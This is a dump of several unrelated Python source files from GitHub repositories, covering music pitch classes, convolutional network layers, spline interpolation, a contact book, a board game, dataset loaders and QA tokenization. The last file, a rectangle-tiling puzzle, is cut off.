NumberedPitchClass(4)\n NumberedPitchClass(6) NumberedPitchClass(5)\n NumberedPitchClass(7) NumberedPitchClass(6)\n NumberedPitchClass(8) NumberedPitchClass(7)\n NumberedPitchClass(9) NumberedPitchClass(8)\n NumberedPitchClass(10) NumberedPitchClass(9)\n NumberedPitchClass(11) NumberedPitchClass(10)\n\n Returns new numbered pitch-class.\n '''\n return type(self)(self.number + n)\n","repo_name":"GregoryREvans/Abjad-Microtones","sub_path":"NumberedPitchClass.py","file_name":"NumberedPitchClass.py","file_ext":"py","file_size_in_byte":17510,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"39788250809","text":"__author__ = 'yo'\nimport string\nimport random\n\nKEY_LEN = 5\nKEY_ALL = 150\n\n\ndef base_str():\n print(string.ascii_letters + string.digits)\n return (string.ascii_letters + string.digits)\n\n\ndef key_gen():\n keylist = [random.choice(base_str()) for i in range(KEY_LEN)]\n print(keylist)\n return (\"\".join(keylist))\n\n\ndef key_num(num, result=None):\n if result is None:\n result = []\n for i in range(num):\n result.append(key_gen())\n return result\n\n\ndef print_key(num):\n r=[]\n for i in key_num(num):\n print(i)\n r.append(i)\n return r\n\n\nif __name__ == \"__main__\":\n # e=print_key(KEY_ALL)\n s=str(string.ascii_letters + string.digits)\n print(len(s))\n # o=[]\n # for j in e:\n # if j not in o:\n # o.append(\"CUK\"+j)\n # print(o)\n # print(len(o))\n # with open(\"ckey.txt\", \"a\",encoding=\"utf-8\") as f:\n #\n # for i in o:\n # f.write(i+\"\\n\")","repo_name":"shuo502/ipscan","sub_path":"cc.py","file_name":"cc.py","file_ext":"py","file_size_in_byte":937,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"4492575203","text":"from matplotlib.figure import \\\n Figure\nfrom scipy import interpolate as ip\nfrom traits.api import Array, Float, Event, \\\n ToolbarButton, on_trait_change, \\\n Property, cached_property, Enum, Instance, Bool\nfrom traitsui.api import View, VGroup, UItem\n# from util.traits.editors import \\\n# MPLFigureEditor\nfrom view.ui import BMCSLeafNode\n\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n\nclass MFnLineArray(BMCSLeafNode):\n\n # Public Traits\n xdata = Array(float, value=[0.0, 1.0])\n\n def _xdata_default(self):\n '''\n convenience default - when xdata not defined created automatically as\n an array of integers with the same shape as ydata\n '''\n return np.arange(self.ydata.shape[0])\n\n ydata = Array(float, value=[0.0, 1.0])\n\n def __init__(self, *args, **kw):\n super(MFnLineArray, self).__init__(*args, **kw)\n self.replot()\n\n extrapolate = Enum('constant', 'exception', 'diff', 'zero')\n '''\n Vectorized interpolation using scipy.interpolate\n '''\n\n def values(self, x, k=1):\n '''\n vectorized interpolation, k is the spline order, default set to 1 (linear)\n '''\n tck = ip.splrep(self.xdata, self.ydata, s=0, k=k)\n\n x = np.array([x]).flatten()\n\n if self.extrapolate == 'diff':\n values = ip.splev(x, tck, der=0)\n elif self.extrapolate == 'exception':\n if x.all() < self.xdata[0] and x.all() > self.xdata[-1]:\n values = values = ip.splev(x, tck, der=0)\n else:\n raise ValueError('value(s) outside interpolation range')\n elif self.extrapolate == 'constant':\n values = ip.splev(x, tck, der=0)\n values[x < self.xdata[0]] = self.ydata[0]\n values[x > self.xdata[-1]] = self.ydata[-1]\n elif self.extrapolate == 'zero':\n values = ip.splev(x, tck, der=0)\n values[x < self.xdata[0]] = 0.0\n values[x > self.xdata[-1]] = 0.0\n return values\n\n def __call__(self, x):\n return self.values(x)\n\n yrange = Property\n '''Get min max values on the vertical axis\n '''\n\n def _get_yrange(self):\n return np.min(self.ydata), np.max(self.ydata)\n\n xrange = Property\n '''Get min max values on the vertical axis\n '''\n\n def _get_xrange(self):\n return np.min(self.xdata), np.max(self.xdata)\n\n data_changed = Event\n\n figure = Instance(Figure)\n\n def _figure_default(self):\n figure = Figure(facecolor='white')\n return figure\n\n def diff(self, x, k=1, der=1):\n '''\n vectorized interpolation, der is the nth derivative, default set to 1;\n k is the spline order of the data inetrpolation, default set to 1 (linear)\n '''\n xdata = np.sort(np.hstack((self.xdata, x)))\n idx = np.argwhere(np.diff(xdata) == 0).flatten()\n xdata = np.delete(xdata, idx)\n tck = ip.splrep(xdata, self.values(xdata, k=k), s=0, k=k)\n return ip.splev(x, tck, der=der)\n\n dump_button = ToolbarButton('Print data',\n style='toolbar')\n\n @on_trait_change('dump_button')\n def print_data(self, event=None):\n print('x = ', repr(self.xdata))\n print('y = ', repr(self.ydata))\n\n integ = Property(Float(), depends_on='ydata')\n\n @cached_property\n def _get_integ(self):\n _xdata = self.xdata\n _ydata = self.ydata\n # integral under the stress strain curve\n return np.trapz(_ydata, _xdata)\n\n def clear(self):\n self.xdata = np.array([])\n self.ydata = np.array([])\n\n def plot(self, axes, *args, **kw):\n self.mpl_plot(axes, *args, **kw)\n\n def mpl_plot(self, axes, *args, **kw):\n '''plot within matplotlib window'''\n axes.plot(self.xdata, self.ydata, *args, **kw)\n\n def mpl_plot_diff(self, axes, *args, **kw):\n '''plot within matplotlib window'''\n ax_dx = axes.twinx()\n x = np.linspace(self.xdata[0], self.xdata[-1],\n np.size(self.xdata) * 20.0)\n y_dx = self.diff(x, k=1, der=1)\n ax_dx.plot(x, y_dx, *args + ('-',), **kw)\n\n plot_diff = Bool(False)\n\n def replot(self):\n self.figure.clf()\n ax = self.figure.add_subplot(111)\n self.mpl_plot(ax)\n if self.plot_diff:\n self.mpl_plot_diff(ax, color='orange')\n self.data_changed = True\n\n def savefig(self, fname):\n fig = plt.figure()\n ax = fig.add_subplot(111)\n self.mpl_plot(ax)\n self.mpl_plot_diff(ax, color='orange')\n fig.savefig(fname)\n\n tree_view = View(\n VGroup(\n VGroup(\n # UItem('figure', editor=MPLFigureEditor(),\n # resizable=True,\n # springy=True),\n # scrollable=True,\n ),\n )\n )\n\n traits_view = tree_view\n\n\nif __name__ == '__main__':\n import pylab as plt\n\n# from matplotlib import pyplot as plt\n x = np.linspace(-2, 7, 20)\n xx = np.linspace(-4, 8, 100)\n y = np.sin(x)\n\n mf = MFnLineArray(xdata=x, ydata=y)\n\n # plots raw data\n def data():\n plt.plot(x, y, 'ro', label='data')\n\n # plots values with extrapolation as constant value\n def constant():\n mf.extrapolate = 'constant'\n plt.plot(xx, mf(xx), label='constant')\n plt.plot(xx, mf.diff(xx), label='constant diff')\n\n # plots values with extrapolation as zero\n def zero():\n mf.extrapolate = 'zero'\n plt.plot(xx, mf(xx), label='zero')\n plt.plot(xx, mf.diff(xx), label='zero diff')\n\n # plots values with extrapolation with constant slope\n def diff():\n mf.extrapolate = 'diff'\n plt.plot(xx, mf(xx), label='diff')\n plt.plot(xx, mf.diff(xx,), label='diff diff')\n\n # raises an exception if data are outside the interpolation range\n def exception():\n mf.extrapolate = 'exception'\n plt.plot(xx, mf(xx), label='exception')\n\n data()\n # constant()\n # zero()\n diff()\n # exception()\n plt.legend(loc='best')\n plt.show()\n\n mf.replot()\n mf.configure_traits()\n","repo_name":"simvisage/bmcs","sub_path":"mathkit/mfn/mfn_line/mfn_line.py","file_name":"mfn_line.py","file_ext":"py","file_size_in_byte":6200,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"35262659438","text":"from arquivos_obi import read_OBI_files\n\nfor input, sol, file_input, file_output in read_OBI_files(\"\\escher\"):\n tamanho = int(input[0])\n sequencia = input[1].split(\" \")\n sequencia = [int(x) for x in sequencia]\n\n gabarito = sol[0]\n\n saida = None\n sequencia_reversa = sequencia.copy()\n sequencia_reversa.reverse()\n\n numero_escher = sequencia[0] + sequencia_reversa[0]\n for i, j in zip(sequencia, sequencia_reversa):\n if (i + j) != numero_escher:\n saida = \"N\"\n break\n else:\n saida = \"S\"\n\n if saida != gabarito:\n print(\"Erro para\", sequencia)\n print(\"Saida gerada:\", saida)\n print(\"Gabarito:\", gabarito)\n print(file_input, file_output)\n","repo_name":"lucaslattari/OBI-2020-Junior-Fase-1","sub_path":"escher_arquivo.py","file_name":"escher_arquivo.py","file_ext":"py","file_size_in_byte":737,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"30059973474","text":"import numpy as np\nfrom nndl.layers import *\nimport pdb\n\n\"\"\" \nThis code was originally written for CS 231n at Stanford University\n(cs231n.stanford.edu). It has been modified in various areas for use in the\nECE 239AS class at UCLA. This includes the descriptions of what code to\nimplement as well as some slight potential changes in variable names to be\nconsistent with class nomenclature. We thank Justin Johnson & Serena Yeung for\npermission to use this code. To see the original version, please visit\ncs231n.stanford.edu. \n\"\"\"\n\ndef conv_forward_naive(x, w, b, conv_param):\n \"\"\"\n A naive implementation of the forward pass for a convolutional layer.\n\n The input consists of N data points, each with C channels, height H and width\n W. We convolve each input with F different filters, where each filter spans\n all C channels and has height HH and width HH.\n\n Input:\n - x: Input data of shape (N, C, H, W)\n - w: Filter weights of shape (F, C, HH, WW)\n - b: Biases, of shape (F,)\n - conv_param: A dictionary with the following keys:\n - 'stride': The number of pixels between adjacent receptive fields in the\n horizontal and vertical directions.\n - 'pad': The number of pixels that will be used to zero-pad the input.\n\n Returns a tuple of:\n - out: Output data, of shape (N, F, H', W') where H' and W' are given by\n H' = 1 + (H + 2 * pad - HH) / stride\n W' = 1 + (W + 2 * pad - WW) / stride\n - cache: (x, w, b, conv_param)\n \"\"\"\n out = None\n pad = conv_param['pad']\n stride = conv_param['stride']\n\n # ================================================================ #\n # YOUR CODE HERE:\n # Implement the forward pass of a convolutional neural network.\n # Store the output as 'out'.\n # Hint: to pad the array, you can use the function np.pad.\n # ================================================================ #\n\n N, C, H, W = x.shape # [N, 3, 32, 32]\n F, C, HH, WW = w.shape # [32, 3, 7, 7]\n\n padded_x = (np.pad(x, ((0, 0), (0, 0), (pad, pad), (pad, pad)), 'constant')) # [N, 3, 38, 38]\n out_height = np.int(((H + 2 * pad - HH) / stride) + 1) # 32\n out_width = np.int(((W + 2 * pad - WW) / stride) + 1) # 32\n out = np.zeros([N, F, out_height, out_width]) # [N, 32, 32, 32]\n\n for img in range(N): # for each image, do convolutional process\n for kernal in range(F): # for each channel, there are 3 W (7x7) and 1 b (scalar), linear sum together\n for row in range(out_height): # from top to bottom\n for col in range(out_width): # from left to right\n # each kernal has 3 W (7x7), for each elements in W, multiply it with corresponding elements in original graph\n # then add up these 49 numbers together -> 1 scalar\n # then add up three scalar and 1 bias, as the current position's convolutional result\n out[img, kernal, row, col] = np.sum(w[kernal, ...] * \\\n padded_x[img, :, row*stride:row*stride+HH, col*stride:col*stride+WW]) + b[kernal]\n\n # ================================================================ #\n # END YOUR CODE HERE\n # ================================================================ #\n \n cache = (x, w, b, conv_param)\n return out, cache\n\n\ndef conv_backward_naive(dout, cache):\n \"\"\"\n A naive implementation of the backward pass for a convolutional layer.\n\n Inputs:\n - dout: Upstream derivatives.\n - cache: A tuple of (x, w, b, conv_param) as in conv_forward_naive\n\n Returns a tuple of:\n - dx: Gradient with respect to x\n - dw: Gradient with respect to w\n - db: Gradient with respect to b\n \"\"\"\n dx, dw, db = None, None, None\n\n N, F, out_height, out_width = dout.shape\n x, w, b, conv_param = cache\n \n stride, pad = [conv_param['stride'], conv_param['pad']]\n xpad = np.pad(x, ((0,0), (0,0), (pad,pad), (pad,pad)), mode='constant')\n num_filts, _, f_height, f_width = w.shape\n\n # ================================================================ #\n # YOUR CODE HERE:\n # Implement the backward pass of a convolutional neural network.\n # Calculate the gradients: dx, dw, and db.\n # ================================================================ #\n\n _, _, H, W = x.shape # [N, 3, 32, 32]\n dx_temp = np.zeros_like(xpad) # initial to all zeros\n dw = np.zeros_like(w)\n db = np.zeros_like(b)\n\n # Calculate dB.\n for kernal in range(F):\n db[kernal] += np.sum(dout[:, kernal, :, :]) # sum all N img's kernal -> [32, 32], then sum all 32x32 elements -> 1 scalar\n \n # Calculate dw.\n for img in range(N): # for each image\n for kernal in range(F): # for each kernal\n for row in range(out_height): # from top to bottom\n for col in range(out_width): # from left to right\n dw[kernal, ...] += dout[img, kernal, row, col] * xpad[img, :, row*stride:row*stride+f_height, col*stride:col*stride+f_width]\n \n # Calculate dx.\n for img in range(N): # for each image\n for kernal in range(F): # for each kernal\n for row in range(out_height): # from top to bottom\n for col in range(out_width): # from left to right\n dx_temp[img, :, row*stride:row*stride+f_height, col*stride:col*stride+f_width] += dout[img, kernal, row,col] * w[kernal, ...]\n \n dx = dx_temp[:, :, pad:H+pad, pad:W+pad]\n\n # ================================================================ #\n # END YOUR CODE HERE\n # ================================================================ #\n\n return dx, dw, db\n\n\ndef max_pool_forward_naive(x, pool_param):\n \"\"\"\n A naive implementation of the forward pass for a max pooling layer.\n\n Inputs:\n - x: Input data, of shape (N, C, H, W)\n - pool_param: dictionary with the following keys:\n - 'pool_height': The height of each pooling region\n - 'pool_width': The width of each pooling region\n - 'stride': The distance between adjacent pooling regions\n\n Returns a tuple of:\n - out: Output data\n - cache: (x, pool_param)\n \"\"\"\n out = None\n \n # ================================================================ #\n # YOUR CODE HERE:\n # Implement the max pooling forward pass.\n # ================================================================ #\n\n pool_height = pool_param.get('pool_height')\n pool_width = pool_param.get('pool_width')\n stride = pool_param.get('stride')\n N, C, H, W = x.shape # [N, 3, 32, 32]\n\n out_height = np.int(((H - pool_height) / stride) + 1) # calculate output height\n out_width = np.int(((W - pool_width) / stride) + 1) # calculate output width\n out = np.zeros([N, C, out_height, out_width])\n\n for img in range(N): # for each image\n for channel in range(C): # for each channel\n for row in range(out_height): # from top to bottom\n for col in range(out_width): # from left to right\n out[img, channel, row, col] = np.max(x[img, channel, row*stride:row*stride+pool_height, col*stride:col*stride+pool_width])\n\n # ================================================================ #\n # END YOUR CODE HERE\n # ================================================================ # \n cache = (x, pool_param)\n return out, cache\n\ndef max_pool_backward_naive(dout, cache):\n \"\"\"\n A naive implementation of the backward pass for a max pooling layer.\n\n Inputs:\n - dout: Upstream derivatives\n - cache: A tuple of (x, pool_param) as in the forward pass.\n\n Returns:\n - dx: Gradient with respect to x\n \"\"\"\n dx = None\n x, pool_param = cache\n pool_height, pool_width, stride = pool_param['pool_height'], pool_param['pool_width'], pool_param['stride']\n\n # ================================================================ #\n # YOUR CODE HERE:\n # Implement the max pooling backward pass.\n # ================================================================ #\n \n N, C, H, W = x.shape # [N, 3, 32, 32]\n _, _, dout_height, dout_width = dout.shape\n dx = np.zeros_like(x)\n\n for img in range(N): # for each image\n for channel in range(C): # for each channel\n for row in range(dout_height): # from top to bottom\n for col in range(dout_width): # from left to right\n max_idx = np.argmax(x[img, channel, row*stride:row*stride+pool_height, col*stride:col*stride+pool_width])\n max_position = np.unravel_index(max_idx, [pool_height, pool_width])\n dx[img, channel, row*stride:row*stride+pool_height, col*stride:col*stride+pool_width][max_position] = dout[img, channel, row, col]\n\n # ================================================================ #\n # END YOUR CODE HERE\n # ================================================================ # \n\n return dx\n\ndef spatial_batchnorm_forward(x, gamma, beta, bn_param):\n \"\"\"\n Computes the forward pass for spatial batch normalization.\n \n Inputs:\n - x: Input data of shape (N, C, H, W)\n - gamma: Scale parameter, of shape (C,)\n - beta: Shift parameter, of shape (C,)\n - bn_param: Dictionary with the following keys:\n - mode: 'train' or 'test'; required\n - eps: Constant for numeric stability\n - momentum: Constant for running mean / variance. momentum=0 means that\n old information is discarded completely at every time step, while\n momentum=1 means that new information is never incorporated. The\n default of momentum=0.9 should work well in most situations.\n - running_mean: Array of shape (D,) giving running mean of features\n - running_var Array of shape (D,) giving running variance of features\n \n Returns a tuple of:\n - out: Output data, of shape (N, C, H, W)\n - cache: Values needed for the backward pass\n \"\"\"\n out, cache = None, None\n\n # ================================================================ #\n # YOUR CODE HERE:\n # Implement the spatial batchnorm forward pass.\n #\n # You may find it useful to use the batchnorm forward pass you \n # implemented in HW #4.\n # ================================================================ #\n \n N, C, H, W = x.shape # [N, 3, 32, 32]\n x_transpose = x.transpose(0, 2, 3, 1)\n x_reshape = np.reshape(x_transpose, (N*H*W, C)) # reshape to 2D to do batchnorm\n out_2d, cache = batchnorm_forward(x_reshape, gamma, beta, bn_param) \n out = out_2d.reshape((N, H, W, C)).transpose(0, 3, 1, 2) # reshape back\n\n # ================================================================ #\n # END YOUR CODE HERE\n # ================================================================ # \n\n return out, cache\n\n\ndef spatial_batchnorm_backward(dout, cache):\n \"\"\"\n Computes the backward pass for spatial batch normalization.\n \n Inputs:\n - dout: Upstream derivatives, of shape (N, C, H, W)\n - cache: Values from the forward pass\n \n Returns a tuple of:\n - dx: Gradient with respect to inputs, of shape (N, C, H, W)\n - dgamma: Gradient with respect to scale parameter, of shape (C,)\n - dbeta: Gradient with respect to shift parameter, of shape (C,)\n \"\"\"\n dx, dgamma, dbeta = None, None, None\n\n # ================================================================ #\n # YOUR CODE HERE:\n # Implement the spatial batchnorm backward pass.\n #\n # You may find it useful to use the batchnorm forward pass you \n # implemented in HW #4.\n # ================================================================ #\n \n dx = np.zeros_like(dout)\n N, C, H, W = dout.shape\n dout_transpose = dout.transpose((0, 2, 3, 1))\n dout_reshape = np.reshape(dout_transpose, (N*H*W, C)) # reshape to 2D to do batchnorm\n dx_2d, dgamma, dbeta = batchnorm_backward(dout_reshape, cache)\n dx = dx_2d.reshape((N, H, W, C)).transpose(0, 3, 1, 2) # reshape back\n\n # ================================================================ #\n # END YOUR CODE HERE\n # ================================================================ # \n\n return dx, dgamma, dbeta","repo_name":"Wangxh329/Neural-Networks-and-Deep-Learning","sub_path":"homework/hw5/code/nndl/conv_layers.py","file_name":"conv_layers.py","file_ext":"py","file_size_in_byte":11637,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"37"} +{"seq_id":"42332423218","text":"#x=open(\"C:\\\\Users\\\\DELL PC\\\\Desktop\\\\Python playground\\\\ContactBook\\\\CONTACT-Book.txt\",\"x\")\n\ndef cBookadd(c_name,c_phno):\n cb_add=open(\"C:\\\\Users\\\\DELL PC\\\\Desktop\\\\Python playground\\\\ContactBook\\\\CONTACT-Book.txt\",\"a\")\n \n cb_add.write( \"\\n\",c_name+\": \"+str(c_phno))\n cb_add.close()\n\n\ndef cBook_read():\n c_open=open(\"C:\\\\Users\\\\DELL PC\\\\Desktop\\\\Python playground\\\\ContactBook\\\\CONTACT-Book.txt\",\"r\")\n for lines in c_open.readlines():\n print(lines)\n c_open.close()\n\n\ndef cSerch(line):\n n=1\n \n c_opens=open(\"C:\\\\Users\\\\DELL PC\\\\Desktop\\\\Python playground\\\\ContactBook\\\\CONTACT-Book.txt\",\"r\")\n if n==1:\n for lines in c_opens:\n l=len(lines)\n if (line in lines) and (len(line)==(l-13)) :\n print(lines)\n n-=1\n \n\n else:\n c_opens.close()\n print(\"S\")\n \n \n \n \n \n \n \n \n \n\n\n\n\n \n \n \n\n \n\n\n\n\n\n\n\nuser_Choice=input(\"Want to 'Add-contact' OR 'Read-Contact' (add or read): \").lower()\nif user_Choice==\"add\":\n c_name=input(\"Enter the name :\")\n c_phno=int(input(\"Enter the phno:\"))\n cBookadd(c_name,c_phno)\nelif user_Choice==\"read\":\n cBook_read()\nelif user_Choice==\"serch\":\n line=input(\"Enter the name: \")\n cSerch(line)","repo_name":"Arangarajan-Aero/contactBook","sub_path":"Contact.py","file_name":"Contact.py","file_ext":"py","file_size_in_byte":1331,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"34904146994","text":"from tabuleiro import Tabuleiro\nfrom bestMoveSoldier import melhorMovimento\nimport os\n\ntab = Tabuleiro()\n\ngameLoop = True\n\n# voce quer jogar como?\nprint(\"Bem vindo ao jogo!\")\nplayer = input(\"Voce quer jogar como Soldado(S) ou Mercenario(M)?:\\n\")\n# posiveis M, S\n\nif player == \"S\" or player == \"s\":\n player = \"sold\"\nelif player == \"M\" or player == \"m\":\n player = \"merc\"\nelse:\n print(\"Opcao invalida\")\n gameLoop = False\n\nif player == \"merc\":\n print(\"Voce esta jogando como Mercenario\\n\")\nelse:\n player = \"sold\"\n print(\"Voce esta jogando como Soldado\\n\")\n\n\nwhile gameLoop:\n os.system(\"clear\")\n tab.printInTerminal()\n tab.printInWeb()\n\n # captar x, y\n positionSelected = input(\"Digite a posição da peça a ser movida (x, y):\\n\")\n if positionSelected:\n # split por ,\n positionSelected = positionSelected.split(\",\")\n # transformar em int\n positionSelected = [int(positionSelected[0]), int(positionSelected[1])]\n\n peca = tab.matrix[positionSelected[0]][positionSelected[1]]\n\n if peca.tipo == None:\n print(\"Nao ha peça nessa posição!\\n\")\n delay = input('Pressione \"Enter\" para continuar...')\n continue\n elif peca.tipo == \"king\" and player == \"sold\":\n print(\"Voce escolheu o Rei!\\n\")\n elif peca.tipo != player:\n print(peca.tipo, player)\n print(\"Essa peça não é sua!\\n\")\n delay = input('Pressione \"Enter\" para continuar...')\n continue\n\n print(peca.tipo)\n\n # movimentos possiveis\n movimentosPossiveis = tab.checarMovimentosPossiveis(peca)\n print(movimentosPossiveis)\n\n if len(movimentosPossiveis) == 0:\n print(\"Não há movimentos possíveis para essa peça!\\n\")\n delay = input('Pressione \"Enter\" para continuar...')\n continue\n\n print(\"Os movimentos possíveis para essa peça são:\\n\")\n for i in range(len(movimentosPossiveis)):\n print(\"Movimento\", i, \":\", movimentosPossiveis[i])\n\n # captar movimento\n movimento = input(\"Digite o movimento que deseja fazer (numero):\\n\")\n movimento = int(movimento)\n\n if movimento >= len(movimentosPossiveis):\n print(\"Movimento inválido!\\n\")\n delay = input('Pressione \"Enter\" para continuar...')\n continue\n\n tab.moverPeca(\n peca, movimentosPossiveis[movimento][0], movimentosPossiveis[movimento][1]\n )\n\n # MOVIMENTO INIMIGO\n nomeRealTurno = player\n if player == \"sold\":\n nomeRealTurno = \"soldado\"\n else:\n nomeRealTurno = \"mercenario\"\n\n melhorMovInimigo = melhorMovimento(tab, nomeRealTurno)\n print(\"peca\", melhorMovInimigo[1])\n\n print(\"opa\", melhorMovInimigo[0][\"x\"], melhorMovInimigo[0][\"y\"])\n tab.moverPeca(\n melhorMovInimigo[1],\n melhorMovInimigo[0][\"x\"],\n melhorMovInimigo[0][\"y\"],\n )\n\n delay = input('Pressione \"Enter\" para continuar...')\n","repo_name":"VictorHugoDS/ProjetoIA2022","sub_path":"estruturaDados/init.py","file_name":"init.py","file_ext":"py","file_size_in_byte":3004,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"28604382284","text":"import os\nfrom typing import Tuple\n\nimport numpy as np\nfrom sklearn.model_selection import train_test_split\nfrom torchvision import datasets as torchdata\n\nfrom continuum.datasets import ImageFolderDataset\nfrom continuum.download import download_file_from_google_drive, untar\nfrom continuum.tasks import TaskType\n\n\nclass VLCS(ImageFolderDataset):\n \"\"\"VLCS dataset group.\n\n Contain Caltech101, LabelMe, SUN09, and VOC2007. Each made of 5 classes:\n bird, car, chair, dog, and person.\n\n * Unbiased Metric Learning: On the Utilization of Multiple Datasets and Web Images for Softening Bias\n Fang, Xu, and Rockmore.\n ICCV 2013\n \"\"\"\n\n images_gdrive_id = \"1skwblH1_okBwxWxmRsp9_qi15hyPpxg8\"\n\n def __init__(\n self,\n data_path,\n train: bool = True,\n download: bool = True,\n test_split: float = 0.2,\n random_seed: int = 1,\n ):\n self._attributes = None\n self.test_split = test_split\n self.random_seed = random_seed\n super().__init__(data_path, train, download)\n\n @property\n def data_type(self) -> TaskType:\n return TaskType.IMAGE_PATH\n\n def _download(self):\n if not os.path.exists(os.path.join(self.data_path, \"VLCS\")):\n tar_path = os.path.join(self.data_path, \"VLCS.tar.gz\")\n\n if not os.path.exists(tar_path):\n print(\"Downloading zip images archive...\", end=\" \")\n download_file_from_google_drive(self.images_gdrive_id, tar_path)\n print(\"Done!\")\n\n print(\"Extracting archive...\", end=\" \")\n untar(tar_path)\n print(\"Done!\")\n\n def get_data(self) -> Tuple[np.ndarray, np.ndarray, np.ndarray]:\n domains = [\"Caltech101\", \"LabelMe\", \"SUN09\", \"VOC2007\"]\n\n full_x, full_y, full_t = [], [], []\n\n for domain_id, domain_name in enumerate(domains):\n dataset = torchdata.ImageFolder(\n os.path.join(self.data_path, \"VLCS\", domain_name)\n )\n x, y, _ = self._format(dataset.imgs)\n x_train, x_test, y_train, y_test = train_test_split(\n x, y, test_size=self.test_split, random_state=self.random_seed\n )\n\n if self.train:\n full_x.append(x_train),\n full_y.append(y_train)\n else:\n full_x.append(x_test)\n full_y.append(y_test)\n full_t.append(np.ones_like(full_y[-1]) * domain_id)\n\n x = np.concatenate(full_x)\n y = np.concatenate(full_y)\n t = np.concatenate(full_t)\n return x, y, t\n","repo_name":"Continvvm/continuum","sub_path":"continuum/datasets/vlcs.py","file_name":"vlcs.py","file_ext":"py","file_size_in_byte":2600,"program_lang":"python","lang":"en","doc_type":"code","stars":368,"dataset":"github-code","pt":"37"} +{"seq_id":"21012166636","text":"class Features:\r\n def __init__(self, tokenizer, max_length, stride):\r\n self.max_length = max_length\r\n self.stride = stride\r\n self.tokenizer = tokenizer\r\n\r\n def train_processing(self, dataset):\r\n questions = [q.strip() for q in dataset['question']]\r\n inputs = self.tokenizer(questions, dataset['context'],\r\n max_length = self.max_length,\r\n truncation = 'only_second',\r\n stride = self.stride,\r\n return_overflowing_tokens = True,\r\n reutrn_offsets_mapping = True,\r\n padding = 'max_length')\r\n # Start char and end char of each token \r\n offset_mapping = inputs.pop('offset_mapping')\r\n sample_map = inputs.pop('overflow_to_sample_mapping')\r\n answers = dataset['answer']\r\n start_positions = []\r\n end_positions = []\r\n\r\n for i, offset in enumerate(offset_mapping):\r\n sample_idx = sample_map[i]\r\n answer = answers[sample_idx]\r\n start_char = answer['answer_start'][0]\r\n end_char = start_char + len(answer['text'][0])\r\n sequence_ids = inputs.sequence_ids(i)\r\n\r\n idx = 0\r\n while sequence_ids[idx] != 1:\r\n idx += 1\r\n # Index of the start token of the context \r\n context_start = idx\r\n\r\n while sequence_ids[idx] == 1:\r\n idx += 1\r\n # Index of the end token of the context \r\n context_end = idx - 1\r\n\r\n # Create label\r\n if offset[context_start][0] > start_char or offset[context_end][1] < end_char:\r\n start_positions.append(0)\r\n end_positions.append(0)\r\n else:\r\n idx = context_start\r\n while idx <= context_end and offset[idx][0] <= start_char:\r\n idx += 1\r\n start_positions.append(idx - 1)\r\n\r\n idx = context_end\r\n while idx >= context_start and offset[idx][1] >= end_char:\r\n idx -= 1\r\n end_positions.append(idx + 1)\r\n\r\n inputs['start_positions'] = start_positions\r\n inputs['end_positions'] = end_positions\r\n\r\n return inputs\r\n\r\n def valid_processing(self, dataset):\r\n questions = [q.strip() for q in dataset['question']]\r\n inputs = self.tokenizer(questions, dataset['context'],\r\n max_length = self.max_length,\r\n truncation = 'only_second',\r\n stride = self.stride,\r\n return_overflowing_tokens = True,\r\n return_offsets_mapping = True,\r\n padding = 'max_length')\r\n \r\n sample_map = inputs.pop('overflow_to_sample_mapping')\r\n example_ids = []\r\n for i in range(len(inputs['input_ids'])):\r\n sample_idx = sample_map[i]\r\n example_ids.append(dataset['id'][sample_idx])\r\n\r\n sequence_ids = inputs.sequence_ids(i)\r\n offset = inputs['offset_mapping'][i]\r\n inputs['offset_mapping'][i] = [j if sequence_ids[k] == 1 else None for k, j in enumerate(offset)]\r\n\r\n inputs['example_id'] = example_ids \r\n return inputs ","repo_name":"bomba1102/Demo-QA-Extraction-system","sub_path":"features.py","file_name":"features.py","file_ext":"py","file_size_in_byte":3431,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"8274440980","text":"\"\"\"\n@description: 问答图测试接口\n@author: Xu Zhongkai\n@email: 1399350807@qq.com\n@time: 2019-05-27\n@version: 0.0.1\n\"\"\"\n\n\nimport os\nimport json\nimport logging\nfrom sementic_server.source.qa_graph.query_parser import QueryParser\n\nlogger = logging.getLogger(\"server_log\")\n\nif __name__ == '__main__':\n case_num = 2\n # [1, 2, 4]\n if os.path.basename(os.getcwd()) == 'qa_graph':\n path = os.path.join(os.getcwd(), os.path.pardir, os.path.pardir, 'data', 'test_case', 'case%d.json' % case_num)\n else:\n path = os.path.join(os.getcwd(), 'sementic_server', 'data', 'test_case', 'case%d.json' % case_num)\n path = os.path.abspath(path)\n\n try:\n with open(path, 'r') as fr:\n data = json.load(fr)\n print(data)\n qg = QueryParser(data)\n qg.query_graph.show()\n\n output_path = os.path.join(os.getcwd(), os.path.pardir, os.path.pardir, 'output/graph_output')\n if not os.path.exists(output_path):\n os.makedirs(output_path)\n output_path = os.path.join(output_path, 'example.json')\n qg.query_graph.export(output_path)\n except Exception as e:\n print(e)\n\n\n\n\n","repo_name":"xiaocuigit/sementic_server","sub_path":"sementic_server/source/qa_graph/example.py","file_name":"example.py","file_ext":"py","file_size_in_byte":1158,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"15723448937","text":"# -*- coding:utf-8 -*-\n\n__author__ = 'huanghf'\n\n\"\"\"\n题目描述\n我们可以用2*1的小矩形横着或者竖着去覆盖更大的矩形。请问用n个2*1的小矩形无重叠地覆盖一个2*n的大矩形,总共有多少种方法?\n\"\"\"\n\nclass Solution:\n def rectCover(self, number):\n if number == 0:\n return 0\n if number == 1:\n return 1\n if number == 2:\n return 2\n a,b = 1,2\n for i in range(number-1):\n a,b = b,a+b\n return a\n\nnumber = 100\ns = 